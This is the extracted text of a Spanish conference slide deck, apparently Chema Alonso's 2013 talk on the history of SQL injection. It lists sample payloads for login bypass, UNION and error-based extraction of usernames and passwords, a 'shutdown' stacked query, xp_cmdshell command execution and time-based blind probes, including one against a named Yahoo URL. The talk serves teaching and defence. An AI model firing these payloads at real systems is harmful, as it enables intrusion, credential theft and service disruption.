Embed Size (px)
DESCRIPTION
Charla de Chema Alonso sobre la historia y evolución de las técnicas de SQL Injection en el evento Codemotion ES del año 2013 que tuvo lugar en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid
Citation preview
Feliz 15 aniversario, SQL Injection
Los Amantes del Círculo Polar
25 – Dec – 1998: El nacimiento
http://www.phrack.org/issues.html?id=8&issue=54
‘or ‘1’=‘1
q=“Select uid from users where uid=‘“+$user+”’ and pass=“’+pass+’”;”
admin
‘ or ‘1’=‘1
q=“Select uid from users where uid=‘admin’ and pass=‘’ or ‘1’=‘1’;”
14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
Inband
-1‘ union select 1,1,1,1,username,1,’a’,1 from users --
2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
q=“Select title from noticias where ud=“+$id+”;”
Id=1 or 1=(select top 1 username from sysusers)
Jul – 2007: Microsoft Partner Programme
2002 – Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
Advanced Tricks
Id= 1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07’
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
27 – Mar - 2007
Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
2010 – US Army
2010 – US Army
2002 – Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
2004 – Time-Based in Other Databases
SQL Server1) ; if … wait for delay2) ; exec xp_cmdshell (ping –n)
Oracle1) dms_lock.sleep()
PL/SLQ Injection
MySQL1) and sleep()
5.0 or higher2) Benchmarck functions
Postgres:1) pg:sleep()
Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
Apr – 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
Time-Based Using Heavy Queries in MS Access
True
False
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
Serialized SQL Injection
Airthmetic Blind SQL Injection
RFD
Connection String Parameter Pollution
Xpath Injection
LDAP Injection
OWASP TOP 10 - 2013
Forbiden
Fixing Code Injections isn´t the worst job
